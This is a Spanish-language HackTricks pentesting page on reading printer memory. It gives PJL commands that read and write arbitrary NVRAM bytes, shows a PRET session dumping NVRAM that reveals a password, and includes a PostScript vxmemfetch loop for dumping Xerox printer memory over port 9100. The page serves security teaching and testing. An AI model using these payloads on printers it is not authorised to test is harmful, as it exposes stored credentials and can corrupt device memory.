hacktricks/network-services-pentesting/pentesting-printers/memory-access.md

3.9 KiB

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Puedes intentar volcar la NVRAM y extraer información confidencial (como contraseñas) de allí.

En PJL (Brother) puedes acceder a direcciones arbitrarias de NVRAM utilizando PJL como se muestra a continuación:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Puedes probar este ataque utilizando PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Ciertos modelos de impresoras Xerox tienen un operador vxmemfetch de PostScript propietario incorporado, que permite a un atacante leer direcciones de memoria arbitrarias. Utilizando un bucle de PostScript, esta característica puede ser fácilmente utilizada para volcar toda la memoria como se muestra a continuación (PRET no tiene este ataque, por lo que necesitarás enviar este payload al puerto 9100 en una conexión nc):

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

Más información aquí: http://hacking-printers.net/wiki/index.php/Memory_access

Aprende AWS hacking de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: